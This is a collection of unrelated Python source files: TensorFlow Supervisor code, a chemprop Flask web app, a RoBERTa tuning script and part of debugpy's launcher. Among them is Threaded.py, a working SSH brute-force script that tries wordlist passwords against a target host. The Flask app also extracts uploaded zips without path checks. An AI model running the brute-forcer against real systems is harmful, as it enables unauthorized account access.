Note that the queue runners collected in the graph key `QUEUE_RUNNERS`
are already started automatically when you create a session with the
supervisor, so unless you have non-collected queue runners to start
you do not need to call this explicitly.
Args:
sess: A `Session`.
queue_runners: A list of `QueueRunners`. If not specified, we'll use the
list of queue runners gathered in the graph under the key
`GraphKeys.QUEUE_RUNNERS`.
Returns:
The list of threads started for the `QueueRunners`.
"""
if queue_runners is None:
queue_runners = self._graph.get_collection(ops.GraphKeys.QUEUE_RUNNERS)
threads = []
for qr in queue_runners:
threads.extend(qr.create_threads(sess, coord=self._coord, daemon=True,
start=True))
return threads
def loop(self, timer_interval_secs, target, args=None, kwargs=None):
"""Start a LooperThread that calls a function periodically.
If `timer_interval_secs` is None the thread calls `target(*args, **kwargs)`
repeatedly. Otherwise it calls it every `timer_interval_secs`
seconds. The thread terminates when a stop is requested.
The started thread is added to the list of threads managed by the supervisor
so it does not need to be passed to the `stop()` method.
Args:
timer_interval_secs: Number. Time boundaries at which to call `target`.
target: A callable object.
args: Optional arguments to pass to `target` when calling it.
kwargs: Optional keyword arguments to pass to `target` when calling it.
Returns:
The started thread.
"""
looper = coordinator.LooperThread(self._coord, timer_interval_secs,
target=target, args=args, kwargs=kwargs)
looper.start()
return looper
def stop(self, threads=None, close_summary_writer=True):
"""Stop the services and the coordinator.
This does not close the session.
Args:
threads: Optional list of threads to join with the coordinator. If
`None`, defaults to the threads running the standard services, the
threads started for `QueueRunners`, and the threads started by the
`loop()` method. To wait on additional threads, pass the
list in this parameter.
close_summary_writer: Whether to close the `summary_writer`. Defaults to
`True` if the summary writer was created by the supervisor, `False`
otherwise.
"""
self._coord.request_stop()
try:
# coord.join() re-raises the first reported exception; the "finally"
# block ensures that we clean up whether or not an exception was
# reported.
self._coord.join(threads,
stop_grace_period_secs=self._stop_grace_secs)
finally:
# Close the writer last, in case one of the running threads was using it.
if close_summary_writer and self._summary_writer:
# Stop messages are not logged with event.step,
# since the session may have already terminated.
self._summary_writer.add_session_log(SessionLog(status=SessionLog.STOP))
self._summary_writer.close()
self._graph_added_to_summary = False
def request_stop(self, ex=None):
"""Request that the coordinator stop the threads.
See `Coordinator.request_stop()`.
Args:
ex: Optional `Exception`, or Python `exc_info` tuple as returned by
`sys.exc_info()`. If this is the first call to `request_stop()` the
corresponding exception is recorded and re-raised from `join()`.
"""
self._coord.request_stop(ex=ex)
def should_stop(self):
"""Check if the coordinator was told to stop.
See `Coordinator.should_stop()`.
Returns:
True if the coordinator was told to stop, False otherwise.
"""
return self._coord.should_stop()
def stop_on_exception(self):
"""Context handler to stop the supervisor when an exception is raised.
See `Coordinator.stop_on_exception()`.
Returns:
A context handler.
"""
return self._coord.stop_on_exception()
def wait_for_stop(self):
"""Block waiting for the coordinator to stop."""
self._coord.wait_for_stop()
def summary_computed(self, sess, summary, global_step=None):
"""Indicate that a summary was computed.
Args:
sess: A `Session` object.
summary: A Summary proto, or a string holding a serialized summary proto.
global_step: Int. global step this summary is associated with. If `None`,
it will try to fetch the current step.
Raises:
TypeError: if 'summary' is not a Summary proto or a string.
RuntimeError: if the Supervisor was created without a `logdir`.
"""
if not self._summary_writer:
raise RuntimeError("Writing a summary requires a summary writer.")
if global_step is None and self.global_step is not None:
global_step = training_util.global_step(sess, self.global_step)
self._summary_writer.add_summary(summary, global_step)
def _default_global_step_tensor(self):
"""Returns the global_step from the default graph.
Returns:
The global step `Tensor` or `None`.
"""
try:
gs = ops.get_default_graph().get_tensor_by_name("global_step:0")
if gs.dtype.base_dtype in [dtypes.int32, dtypes.int64]:
return gs
else:
logging.warning("Found 'global_step' is not an int type: %s", gs.dtype)
return None
except KeyError:
return None
def _verify_setup(self):
"""Check that all is good.
Raises:
ValueError: If something is not good.
"""
# Not running as chief means that replicas are used.
# In that case all Variables must have their device set.
if not self._is_chief:
for op in self._graph.get_operations():
if op.type in ["Variable", "VariableV2"] and not op.device:
raise ValueError("When using replicas, all Variables must have "
"their device set: %s" % op)
# pylint: disable=g-doc-return-or-yield,broad-except
@contextlib.contextmanager
def managed_session(self, master="", config=None,
start_standard_services=True,
close_summary_writer=True):
"""Returns a context manager for a managed session.
This context manager creates and automatically recovers a session. It
optionally starts the standard services that handle checkpoints and
summaries. It monitors exceptions raised from the `with` block or from the
services and stops the supervisor as needed.
The context manager is typically used as follows:
```python
def train():
sv = tf.train.Supervisor(...)
with sv.managed_session(<master>) as sess:
for step in xrange(..):
if sv.should_stop():
break
sess.run(<my training op>)
...do other things needed at each training step...
```
An exception raised from the `with` block or one of the service threads is
raised again when the block exits. This is done after stopping all threads
and closing the session. For example, an `AbortedError` exception, raised
in case of preemption of one of the workers in a distributed model, is
raised again when the block exits.
If you want to retry the training loop in case of preemption you can do it
as follows:
```python
def main(...):
      while True:
try:
train()
except tf.errors.Aborted:
pass
```
As a special case, exceptions used for control flow, such as
`OutOfRangeError` which reports that input queues are exhausted, are not
raised again from the `with` block: they indicate a clean termination of
the training loop and are considered normal termination.
Args:
master: name of the TensorFlow master to use. See the `tf.Session`
constructor for how this is interpreted.
config: Optional `ConfigProto` proto used to configure the session.
Passed as-is to create the session.
start_standard_services: Whether to start the standard services,
such as checkpoint, summary and step counter.
close_summary_writer: Whether to close the summary writer when
closing the session. Defaults to True.
Returns:
A context manager that yields a `Session` restored from the latest
      checkpoint or initialized from scratch if no checkpoint exists. The
session is closed when the `with` block exits.
"""
try:
sess = self.prepare_or_wait_for_session(
master=master, config=config,
start_standard_services=start_standard_services)
yield sess
except Exception as e:
self.request_stop(e)
finally:
try:
# Request all the threads to stop and wait for them to do so. Any
# exception raised by the threads is raised again from stop().
# Passing stop_grace_period_secs is for blocked enqueue/dequeue
# threads which are not checking for `should_stop()`. They
# will be stopped when we close the session further down.
self.stop(close_summary_writer=close_summary_writer)
finally:
# Close the session to finish up all pending calls. We do not care
# about exceptions raised when closing. This takes care of
# blocked enqueue/dequeue calls.
try:
sess.close()
except Exception:
# Silently ignore exceptions raised by close().
pass
# pylint: enable=g-doc-return-or-yield,broad-except
class SVSummaryThread(coordinator.LooperThread):
"""A thread to save summaries on a timer."""
def __init__(self, sv, sess):
"""Create a SVSummaryThread.
Args:
sv: A `Supervisor`.
sess: A `Session`.
"""
super(SVSummaryThread, self).__init__(sv.coord, sv.save_summaries_secs)
self._sv = sv
self._sess = sess
def run_loop(self):
if self._sv.global_step is not None:
summary_strs, global_step = self._sess.run([self._sv.summary_op,
self._sv.global_step])
else:
summary_strs = self._sess.run(self._sv.summary_op)
global_step = None
if self._sv.summary_writer:
self._sv.summary_writer.add_summary(summary_strs, global_step)
class SVStepCounterThread(coordinator.LooperThread):
"""Threads to count steps and measure their duration."""
def __init__(self, sv, sess):
"""Create a `SVStepCounterThread`.
Args:
sv: A `Supervisor`.
sess: A `Session`.
"""
super(SVStepCounterThread, self).__init__(sv.coord, sv.save_summaries_secs)
self._sv = sv
self._sess = sess
self._last_time = 0.0
self._last_step = 0
self._summary_tag = "%s/sec" % self._sv.global_step.op.name
def start_loop(self):
self._last_time = time.time()
self._last_step = training_util.global_step(
self._sess, self._sv.global_step)
def run_loop(self):
# Count the steps.
current_step = training_util.global_step(self._sess, self._sv.global_step)
added_steps = current_step - self._last_step
self._last_step = current_step
# Measure the elapsed time.
current_time = time.time()
elapsed_time = current_time - self._last_time
self._last_time = current_time
# Reports the number of steps done per second
steps_per_sec = added_steps / elapsed_time
summary = Summary(value=[Summary.Value(tag=self._summary_tag,
simple_value=steps_per_sec)])
if self._sv.summary_writer:
self._sv.summary_writer.add_summary(summary, current_step)
logging.log_first_n(logging.INFO, "%s: %g", 10,
self._summary_tag, steps_per_sec)
class SVTimerCheckpointThread(coordinator.LooperThread):
"""A thread to checkpoint on a timer."""
def __init__(self, sv, sess):
"""Create a `SVTimerCheckpointThread`.
Args:
sv: A `Supervisor`.
sess: A `Session`.
"""
super(SVTimerCheckpointThread, self).__init__(sv.coord, sv.save_model_secs)
self._sv = sv
self._sess = sess
def run_loop(self):
self._sv.saver.save(self._sess, self._sv.save_path,
global_step=self._sv.global_step)
if self._sv.summary_writer and self._sv.global_step is not None:
current_step = training_util.global_step(self._sess, self._sv.global_step)
self._sv.summary_writer.add_session_log(
SessionLog(status=SessionLog.CHECKPOINT,
checkpoint_path=self._sv.save_path),
current_step)
# TODO(sherrym): All non-PEP8 compliant names will be deprecated shortly.
setattr(Supervisor, "PrepareSession", Supervisor.prepare_or_wait_for_session)
setattr(Supervisor, "StartQueueRunners", Supervisor.start_queue_runners)
setattr(Supervisor, "StartStandardServices", Supervisor.start_standard_services)
setattr(Supervisor, "Stop", Supervisor.stop)
setattr(Supervisor, "RequestStop", Supervisor.request_stop)
setattr(Supervisor, "Loop", Supervisor.loop)
setattr(Supervisor, "ShouldStop", Supervisor.should_stop)
setattr(Supervisor, "StopOnException", Supervisor.stop_on_exception)
setattr(Supervisor, "WaitForStop", Supervisor.wait_for_stop)
setattr(Supervisor, "SummaryComputed", Supervisor.summary_computed)
views.py
"""Defines a number of routes/views for the flask app."""
from functools import wraps
import io
import os
import sys
import shutil
from tempfile import TemporaryDirectory, NamedTemporaryFile
import time
from typing import Callable, List, Tuple
import multiprocessing as mp
import zipfile
from flask import json, jsonify, redirect, render_template, request, send_file, send_from_directory, url_for
import numpy as np
from rdkit import Chem
from werkzeug.utils import secure_filename
from app import app, db
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))))
from chemprop.args import PredictArgs, TrainArgs
from chemprop.data.utils import get_data, get_header, get_smiles, validate_data
from chemprop.train.make_predictions import make_predictions
from chemprop.train.run_training import run_training
from chemprop.utils import create_logger, load_task_names, load_args
TRAINING = 0
PROGRESS = mp.Value('d', 0.0)
def check_not_demo(func: Callable) -> Callable:
"""
View wrapper, which will redirect request to site
homepage if app is run in DEMO mode.
:param func: A view which performs sensitive behavior.
:return: A view with behavior adjusted based on DEMO flag.
"""
@wraps(func)
def decorated_function(*args, **kwargs):
if app.config['DEMO']:
return redirect(url_for('home'))
return func(*args, **kwargs)
return decorated_function
def progress_bar(args: TrainArgs, progress: mp.Value):
"""
Updates a progress bar displayed during training.
:param args: Arguments.
:param progress: The current progress.
"""
    # Note: there is no handling yet for crashes during model training.
current_epoch = -1
while current_epoch < args.epochs - 1:
if os.path.exists(os.path.join(args.save_dir, 'verbose.log')):
with open(os.path.join(args.save_dir, 'verbose.log'), 'r') as f:
content = f.read()
if 'Epoch ' + str(current_epoch + 1) in content:
current_epoch += 1
progress.value = (current_epoch + 1) * 100 / args.epochs
else:
pass
time.sleep(0)
def find_unused_path(path: str) -> str:
"""
Given an initial path, finds an unused path by appending different numbers to the filename.
:param path: An initial path.
:return: An unused path.
"""
if not os.path.exists(path):
return path
base_name, ext = os.path.splitext(path)
i = 2
while os.path.exists(path):
path = base_name + str(i) + ext
i += 1
return path
def name_already_exists_message(thing_being_named: str, original_name: str, new_name: str) -> str:
"""
Creates a message about a path already existing and therefore being renamed.
:param thing_being_named: The thing being renamed (ex. Data, Checkpoint).
:param original_name: The original name of the object.
:param new_name: The new name of the object.
:return: A string with a message about the changed name.
"""
    return f'{thing_being_named} "{original_name}" already exists. ' \
           f'Saving to "{new_name}".'
def get_upload_warnings_errors(upload_item: str) -> Tuple[List[str], List[str]]:
"""
Gets any upload warnings passed along in the request.
:param upload_item: The thing being uploaded (ex. Data, Checkpoint).
:return: A tuple with a list of warning messages and a list of error messages.
"""
warnings_raw = request.args.get(f'{upload_item}_upload_warnings')
errors_raw = request.args.get(f'{upload_item}_upload_errors')
warnings = json.loads(warnings_raw) if warnings_raw is not None else None
errors = json.loads(errors_raw) if errors_raw is not None else None
return warnings, errors
def format_float(value: float, precision: int = 4) -> str:
"""
Formats a float value to a specific precision.
:param value: The float value to format.
:param precision: The number of decimal places to use.
:return: A string containing the formatted float.
"""
return f'{value:.{precision}f}'
def format_float_list(array: List[float], precision: int = 4) -> List[str]:
"""
Formats a list of float values to a specific precision.
:param array: A list of float values to format.
:param precision: The number of decimal places to use.
:return: A list of strings containing the formatted floats.
"""
return [format_float(f, precision) for f in array]
@app.route('/receiver', methods=['POST'])
@check_not_demo
def receiver():
"""Receiver monitoring the progress of training."""
return jsonify(progress=PROGRESS.value, training=TRAINING)
@app.route('/')
def home():
"""Renders the home page."""
return render_template('home.html', users=db.get_all_users())
@app.route('/create_user', methods=['GET', 'POST'])
@check_not_demo
def create_user():
"""
If a POST request is made, creates a new user.
Renders the create_user page.
"""
if request.method == 'GET':
return render_template('create_user.html', users=db.get_all_users())
new_name = request.form['newUserName']
    if new_name is not None:
db.insert_user(new_name)
return redirect(url_for('create_user'))
def render_train(**kwargs):
"""Renders the train page with specified kwargs."""
data_upload_warnings, data_upload_errors = get_upload_warnings_errors('data')
return render_template('train.html',
datasets=db.get_datasets(request.cookies.get('currentUser')),
cuda=app.config['CUDA'],
gpus=app.config['GPUS'],
data_upload_warnings=data_upload_warnings,
data_upload_errors=data_upload_errors,
users=db.get_all_users(),
**kwargs)
@app.route('/train', methods=['GET', 'POST'])
@check_not_demo
def train():
"""Renders the train page and performs training if request method is POST."""
global PROGRESS, TRAINING
warnings, errors = [], []
if request.method == 'GET':
return render_train()
# Get arguments
data_name, epochs, ensemble_size, checkpoint_name = \
request.form['dataName'], int(request.form['epochs']), \
int(request.form['ensembleSize']), request.form['checkpointName']
gpu = request.form.get('gpu')
data_path = os.path.join(app.config['DATA_FOLDER'], f'{data_name}.csv')
dataset_type = request.form.get('datasetType', 'regression')
# Create and modify args
args = TrainArgs().parse_args([
'--data_path', data_path,
'--dataset_type', dataset_type,
'--epochs', str(epochs),
'--ensemble_size', str(ensemble_size)
])
# Check if regression/classification selection matches data
data = get_data(path=data_path)
targets = data.targets()
unique_targets = {target for row in targets for target in row if target is not None}
if dataset_type == 'classification' and len(unique_targets - {0, 1}) > 0:
errors.append('Selected classification dataset but not all labels are 0 or 1. Select regression instead.')
return render_train(warnings=warnings, errors=errors)
if dataset_type == 'regression' and unique_targets <= {0, 1}:
errors.append('Selected regression dataset but all labels are 0 or 1. Select classification instead.')
return render_train(warnings=warnings, errors=errors)
if gpu is not None:
if gpu == 'None':
args.cuda = False
else:
args.gpu = int(gpu)
current_user = request.cookies.get('currentUser')
if not current_user:
# Use DEFAULT as current user if the client's cookie is not set.
current_user = app.config['DEFAULT_USER_ID']
ckpt_id, ckpt_name = db.insert_ckpt(checkpoint_name,
current_user,
args.dataset_type,
args.epochs,
args.ensemble_size,
len(targets))
with TemporaryDirectory() as temp_dir:
args.save_dir = temp_dir
process = mp.Process(target=progress_bar, args=(args, PROGRESS))
process.start()
TRAINING = 1
# Run training
logger = create_logger(name='train', save_dir=args.save_dir, quiet=args.quiet)
task_scores = run_training(args, logger)
process.join()
# Reset globals
TRAINING = 0
PROGRESS = mp.Value('d', 0.0)
# Check if name overlap
if checkpoint_name != ckpt_name:
warnings.append(name_already_exists_message('Checkpoint', checkpoint_name, ckpt_name))
# Move models
for root, _, files in os.walk(args.save_dir):
for fname in files:
if fname.endswith('.pt'):
model_id = db.insert_model(ckpt_id)
save_path = os.path.join(app.config['CHECKPOINT_FOLDER'], f'{model_id}.pt')
shutil.move(os.path.join(args.save_dir, root, fname), save_path)
return render_train(trained=True,
metric=args.metric,
num_tasks=len(args.task_names),
task_names=args.task_names,
task_scores=format_float_list(task_scores),
mean_score=format_float(np.mean(task_scores)),
warnings=warnings,
errors=errors)
def render_predict(**kwargs):
"""Renders the predict page with specified kwargs"""
checkpoint_upload_warnings, checkpoint_upload_errors = get_upload_warnings_errors('checkpoint')
return render_template('predict.html',
checkpoints=db.get_ckpts(request.cookies.get('currentUser')),
cuda=app.config['CUDA'],
gpus=app.config['GPUS'],
checkpoint_upload_warnings=checkpoint_upload_warnings,
checkpoint_upload_errors=checkpoint_upload_errors,
users=db.get_all_users(),
**kwargs)
@app.route('/predict', methods=['GET', 'POST'])
def predict():
"""Renders the predict page and makes predictions if the method is POST."""
if request.method == 'GET':
return render_predict()
# Get arguments
ckpt_id = request.form['checkpointName']
if request.form['textSmiles'] != '':
smiles = request.form['textSmiles'].split()
elif request.form['drawSmiles'] != '':
smiles = [request.form['drawSmiles']]
else:
# Upload data file with SMILES
data = request.files['data']
data_name = secure_filename(data.filename)
data_path = os.path.join(app.config['TEMP_FOLDER'], data_name)
data.save(data_path)
# Check if header is smiles
possible_smiles = get_header(data_path)[0]
smiles = [possible_smiles] if Chem.MolFromSmiles(possible_smiles) is not None else []
# Get remaining smiles
smiles.extend(get_smiles(data_path))
models = db.get_models(ckpt_id)
model_paths = [os.path.join(app.config['CHECKPOINT_FOLDER'], f'{model["id"]}.pt') for model in models]
task_names = load_task_names(model_paths[0])
num_tasks = len(task_names)
gpu = request.form.get('gpu')
# Create and modify args
args = PredictArgs().parse_args([
'--test_path', 'None',
'--preds_path', os.path.join(app.config['TEMP_FOLDER'], app.config['PREDICTIONS_FILENAME'])
])
args.checkpoint_paths = model_paths
if gpu is not None:
if gpu == 'None':
args.cuda = False
else:
args.gpu = int(gpu)
train_args = load_args(model_paths[0])
if train_args.features_path is not None:
args.features_generator = ['rdkit_2d_normalized']
args.features_path = None
# Run predictions
preds = make_predictions(args=args, smiles=smiles)
if all(p is None for p in preds):
return render_predict(errors=['All SMILES are invalid'])
    # Replace invalid smiles with message
    invalid_smiles_warning = 'Invalid SMILES String'
    any_invalid_smiles = any(pred is None for pred in preds)
    preds = [pred if pred is not None else [invalid_smiles_warning] * num_tasks for pred in preds]
    return render_predict(predicted=True,
                          smiles=smiles,
                          num_smiles=min(10, len(smiles)),
                          show_more=max(0, len(smiles) - 10),
                          task_names=task_names,
                          num_tasks=len(task_names),
                          preds=preds,
                          warnings=["List contains invalid SMILES strings"] if any_invalid_smiles else None,
                          errors=["No SMILES strings given"] if len(preds) == 0 else None)
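# Hypothetical client-side usage of the /predict route above, for illustration only
# (the server address and checkpoint id are placeholders, and `requests` is assumed
# to be available in the client environment).
def _example_predict_request(base_url='http://127.0.0.1:5000', checkpoint_id='1'):
    import requests as _requests
    form = {
        'checkpointName': checkpoint_id,  # read above via request.form['checkpointName']
        'textSmiles': 'CCO c1ccccc1',     # whitespace-separated SMILES, as split() above expects
        'gpu': 'None',                    # 'None' disables CUDA, matching the handling above
    }
    return _requests.post(f'{base_url}/predict', data=form)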
@app.route('/download_predictions')
def download_predictions():
"""Downloads predictions as a .csv file."""
return send_from_directory(app.config['TEMP_FOLDER'], app.config['PREDICTIONS_FILENAME'], as_attachment=True, cache_timeout=-1)
@app.route('/data')
@check_not_demo
def data():
"""Renders the data page."""
data_upload_warnings, data_upload_errors = get_upload_warnings_errors('data')
return render_template('data.html',
datasets=db.get_datasets(request.cookies.get('currentUser')),
data_upload_warnings=data_upload_warnings,
data_upload_errors=data_upload_errors,
users=db.get_all_users())
@app.route('/data/upload/<string:return_page>', methods=['POST'])
@check_not_demo
def upload_data(return_page: str):
"""
Uploads a data .csv file.
    :param return_page: The name of the page to redirect to after uploading the dataset.
"""
warnings, errors = [], []
current_user = request.cookies.get('currentUser')
if not current_user:
# Use DEFAULT as current user if the client's cookie is not set.
current_user = app.config['DEFAULT_USER_ID']
dataset = request.files['dataset']
with NamedTemporaryFile() as temp_file:
dataset.save(temp_file.name)
dataset_errors = validate_data(temp_file.name)
if len(dataset_errors) > 0:
errors.extend(dataset_errors)
else:
dataset_name = request.form['datasetName']
# dataset_class = load_args(ckpt).dataset_type # TODO: SWITCH TO ACTUALLY FINDING THE CLASS
dataset_id, new_dataset_name = db.insert_dataset(dataset_name, current_user, 'UNKNOWN')
dataset_path = os.path.join(app.config['DATA_FOLDER'], f'{dataset_id}.csv')
if dataset_name != new_dataset_name:
warnings.append(name_already_exists_message('Data', dataset_name, new_dataset_name))
shutil.copy(temp_file.name, dataset_path)
warnings, errors = json.dumps(warnings), json.dumps(errors)
return redirect(url_for(return_page, data_upload_warnings=warnings, data_upload_errors=errors))
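# The warnings/errors serialized above are read back on the rendering side by
# get_upload_warnings_errors(), which is defined elsewhere in this app. A minimal
# sketch of the behaviour this redirect relies on might look like the following
# (an assumption for illustration, not the original helper).
def _example_get_upload_warnings_errors(upload_item: str):
    warnings_raw = request.args.get(f'{upload_item}_upload_warnings')
    errors_raw = request.args.get(f'{upload_item}_upload_errors')
    warnings = json.loads(warnings_raw) if warnings_raw is not None else None
    errors = json.loads(errors_raw) if errors_raw is not None else None
    return warnings, errors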
@app.route('/data/download/<int:dataset>')
@check_not_demo
def download_data(dataset: int):
"""
Downloads a dataset as a .csv file.
:param dataset: The id of the dataset to download.
"""
return send_from_directory(app.config['DATA_FOLDER'], f'{dataset}.csv', as_attachment=True, cache_timeout=-1)
@app.route('/data/delete/<int:dataset>')
@check_not_demo
def delete_data(dataset: int):
"""
Deletes a dataset.
:param dataset: The id of the dataset to delete.
"""
db.delete_dataset(dataset)
os.remove(os.path.join(app.config['DATA_FOLDER'], f'{dataset}.csv'))
return redirect(url_for('data'))
@app.route('/checkpoints')
@check_not_demo
def checkpoints():
"""Renders the checkpoints page."""
checkpoint_upload_warnings, checkpoint_upload_errors = get_upload_warnings_errors('checkpoint')
return render_template('checkpoints.html',
checkpoints=db.get_ckpts(request.cookies.get('currentUser')),
checkpoint_upload_warnings=checkpoint_upload_warnings,
checkpoint_upload_errors=checkpoint_upload_errors,
users=db.get_all_users())
@app.route('/checkpoints/upload/<string:return_page>', methods=['POST'])
@check_not_demo
def upload_checkpoint(return_page: str):
"""
Uploads a checkpoint .pt file.
:param return_page: The name of the page to render after uploading the checkpoint file.
"""
warnings, errors = [], []
current_user = request.cookies.get('currentUser')
if not current_user:
# Use DEFAULT as current user if the client's cookie is not set.
current_user = app.config['DEFAULT_USER_ID']
ckpt = request.files['checkpoint']
ckpt_name = request.form['checkpointName']
ckpt_ext = os.path.splitext(ckpt.filename)[1]
# Collect paths to all uploaded checkpoints (and unzip if necessary)
temp_dir = TemporaryDirectory()
ckpt_paths = []
if ckpt_ext.endswith('.pt'):
ckpt_path = os.path.join(temp_dir.name, 'model.pt')
ckpt.save(ckpt_path)
ckpt_paths = [ckpt_path]
elif ckpt_ext.endswith('.zip'):
ckpt_dir = os.path.join(temp_dir.name, 'models')
zip_path = os.path.join(temp_dir.name, 'models.zip')
ckpt.save(zip_path)
with zipfile.ZipFile(zip_path, mode='r') as z:
z.extractall(ckpt_dir)
for root, _, fnames in os.walk(ckpt_dir):
ckpt_paths += [os.path.join(root, fname) for fname in fnames if fname.endswith('.pt')]
else:
errors.append(f'Uploaded checkpoint(s) file must be either .pt or .zip but got {ckpt_ext}')
# Insert checkpoints into database
if len(ckpt_paths) > 0:
ckpt_args = load_args(ckpt_paths[0])
ckpt_id, new_ckpt_name = db.insert_ckpt(ckpt_name,
current_user,
ckpt_args.dataset_type,
ckpt_args.epochs,
len(ckpt_paths),
ckpt_args.train_data_size)
for ckpt_path in ckpt_paths:
model_id = db.insert_model(ckpt_id)
model_path = os.path.join(app.config['CHECKPOINT_FOLDER'], f'{model_id}.pt')
if ckpt_name != new_ckpt_name:
warnings.append(name_already_exists_message('Checkpoint', ckpt_name, new_ckpt_name))
shutil.copy(ckpt_path, model_path)
temp_dir.cleanup()
warnings, errors = json.dumps(warnings), json.dumps(errors)
return redirect(url_for(return_page, checkpoint_upload_warnings=warnings, checkpoint_upload_errors=errors))
@app.route('/checkpoints/download/<int:checkpoint>')
@check_not_demo
def download_checkpoint(checkpoint: int):
"""
Downloads a zip of model .pt files.
    :param checkpoint: The id of the checkpoint to download.
"""
ckpt = db.query_db(f'SELECT * FROM ckpt WHERE id = {checkpoint}', one = True)
models = db.get_models(checkpoint)
model_data = io.BytesIO()
with zipfile.ZipFile(model_data, mode='w') as z:
for model in models:
model_path = os.path.join(app.config['CHECKPOINT_FOLDER'], f'{model["id"]}.pt')
z.write(model_path, os.path.basename(model_path))
model_data.seek(0)
return send_file(
model_data,
mimetype='application/zip',
as_attachment=True,
attachment_filename=f'{ckpt["ckpt_name"]}.zip',
cache_timeout=-1
)
@app.route('/checkpoints/delete/<int:checkpoint>')
@check_not_demo
def delete_checkpoint(checkpoint: int):
"""
Deletes a checkpoint file.
:param checkpoint: The id of the checkpoint to delete.
"""
db.delete_ckpt(checkpoint)
return redirect(url_for('checkpoints'))
|
grid_minimizer.py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 10 00:08:57 2019
@author: Nate
"""
from simpletransformers.classification import ClassificationModel
import pandas as pd
from sklearn.utils import shuffle
from sklearn.metrics import f1_score, accuracy_score
from skopt import gp_minimize
from skopt.space import Real, Integer, Categorical
from tqdm import tqdm
from skopt.utils import use_named_args
import multiprocessing as mp
import time
from sklearn.metrics import confusion_matrix
# accuracy metrics function
def f1(labels, preds):
return f1_score(labels, preds, average='micro')
def func(params, train, test):
    # Load prior results if they exist; otherwise start with an empty results frame.
    try:
        df = pd.read_csv('opt_results.csv', index_col='Unnamed: 0')
    except (FileNotFoundError, pd.errors.EmptyDataError):
        df = pd.DataFrame()
args = dict()
try:
model = ClassificationModel('roberta', 'roberta-base', num_labels=5)
args = {'overwrite_output_dir': True,'reprocess_input_data': True,
'sliding_window': True, 'train_batch_size':8, 'eval_batch_size':8,
'gradient_accumulation_steps':2, 'max_seq_length':512}
args.update(params)
model.train_model(train, args=args)
result, outputs, _ = model.eval_model(test, f1=f1, acc=accuracy_score)
predict = [row.argmax() for row in outputs]
args.update(result)
args['confusion_matrix'] = confusion_matrix(test['label'], predict)
    except Exception as e:
        # Record the exception so the failed run still appears in the results CSV.
        print(e)
        args['exception'] = str(e)
    # Append this run's results and save; retry if the CSV is temporarily unavailable.
    df = df.append(args, ignore_index=True)
    writing = True
    while writing:
        try:
            df.to_csv('opt_results.csv')
            writing = False
        except Exception as e:
            print(e)
            time.sleep(1)
if __name__ == '__main__':
params = [{'num_train_epochs':1, 'learning_rate':2e-5},
{'num_train_epochs':1, 'learning_rate':3e-5},
{'num_train_epochs':2, 'learning_rate':4e-5},
{'num_train_epochs':4, 'learning_rate':4e-5}]
train = pd.read_csv('tmp_train.csv',index_col='Unnamed: 0')
test = pd.read_csv('tmp_test.csv', index_col='Unnamed: 0')
test.columns = ['text', 'label']
train.columns = ['text', 'label']
for args in params:
p = mp.Process(target=func, args=(args, train, test,))
p.start()
p.join()
p.terminate()
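# Illustrative helper (not part of the original script): once several grid points
# have been evaluated by func(), the accumulated opt_results.csv can be ranked to
# pick the best run. The metric column name assumes the eval_model() results
# (e.g. 'f1') were merged into args as shown above.
def best_run(results_path='opt_results.csv', metric='f1'):
    results = pd.read_csv(results_path, index_col='Unnamed: 0')
    if metric not in results.columns:
        return None
    return results.sort_values(metric, ascending=False).iloc[0]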
|
Threaded.py
|
import paramiko, sys, os, socket, termcolor
import threading, time
stop_flag = 0
def ssh_connect(password, code=0):
global stop_flag
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy)
try:
ssh.connect(host, port=22, username=username, password=password)
stop_flag = 1
print(termcolor.colored(('[+] Found password: ' + password + ' , For account: ' + username), 'green'))
except:
        print(termcolor.colored(('[-] Incorrect login: ' + password), 'red'))
ssh.close()
host = input('[+] Target address: ')
username = input('[+] SSH username: ')
input_file = input('[+] Passwords file: ')
print('\n')
if not os.path.exists(input_file):
print('[!] That file/path does not exist')
sys.exit(1)
print(' * * * Starting threaded SSH bruteforce on ' + host + ' With account: ' + username + '* * *')
# Try each password from the wordlist in its own thread
with open(input_file, 'r') as file:
for line in file.readlines():
if stop_flag == 1:
t.join()
exit()
password = line.strip()
t = threading.Thread(target=ssh_connect, args=(password,))
t.start()
time.sleep(0.5)
|
debuggee.py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See LICENSE in the project root
# for license information.
from __future__ import absolute_import, division, print_function, unicode_literals
import atexit
import os
import struct
import subprocess
import sys
import threading
from debugpy import launcher
from debugpy.common import fmt, log, messaging, compat
from debugpy.launcher import output
process = None
"""subprocess.Popen instance for the debuggee process."""
wait_on_exit_predicates = []
"""List of functions that determine whether to pause after debuggee process exits.
Every function is invoked with exit code as the argument. If any of the functions
returns True, the launcher pauses and waits for user input before exiting.
"""
def describe():
return fmt("Debuggee[PID={0}]", process.pid)
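# Hypothetical example (not part of debugpy): a predicate could be appended to
# wait_on_exit_predicates above like this, so the launcher pauses whenever the
# debuggee exits with a non-zero code. Real predicates are installed elsewhere.
def _example_register_pause_on_failure():
    wait_on_exit_predicates.append(lambda exit_code: exit_code != 0)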
def spawn(process_name, cmdline, env, redirect_output):
log.info(
"Spawning debuggee process:\n\n"
"Command line: {0!r}\n\n"
"Environment variables: {1!r}\n\n",
cmdline,
env,
)
close_fds = set()
try:
if redirect_output:
# subprocess.PIPE behavior can vary substantially depending on Python version
# and platform; using our own pipes keeps it simple, predictable, and fast.
stdout_r, stdout_w = os.pipe()
stderr_r, stderr_w = os.pipe()
close_fds |= {stdout_r, stdout_w, stderr_r, stderr_w}
kwargs = dict(stdout=stdout_w, stderr=stderr_w)
else:
kwargs = {}
try:
global process
process = subprocess.Popen(cmdline, env=env, bufsize=0, **kwargs)
except Exception as exc:
raise messaging.MessageHandlingError(
fmt("Couldn't spawn debuggee: {0}\n\nCommand line:{1!r}", exc, cmdline)
)
log.info("Spawned {0}.", describe())
atexit.register(kill)
launcher.channel.send_event(
"process",
{
"startMethod": "launch",
"isLocalProcess": True,
"systemProcessId": process.pid,
"name": process_name,
"pointerSize": struct.calcsize(compat.force_str("P")) * 8,
},
)
if redirect_output:
for category, fd, tee in [
("stdout", stdout_r, sys.stdout),
("stderr", stderr_r, sys.stderr),
]:
output.CaptureOutput(describe(), category, fd, tee)
close_fds.remove(fd)
wait_thread = threading.Thread(target=wait_for_exit, name="wait_for_exit()")
wait_thread.daemon = True
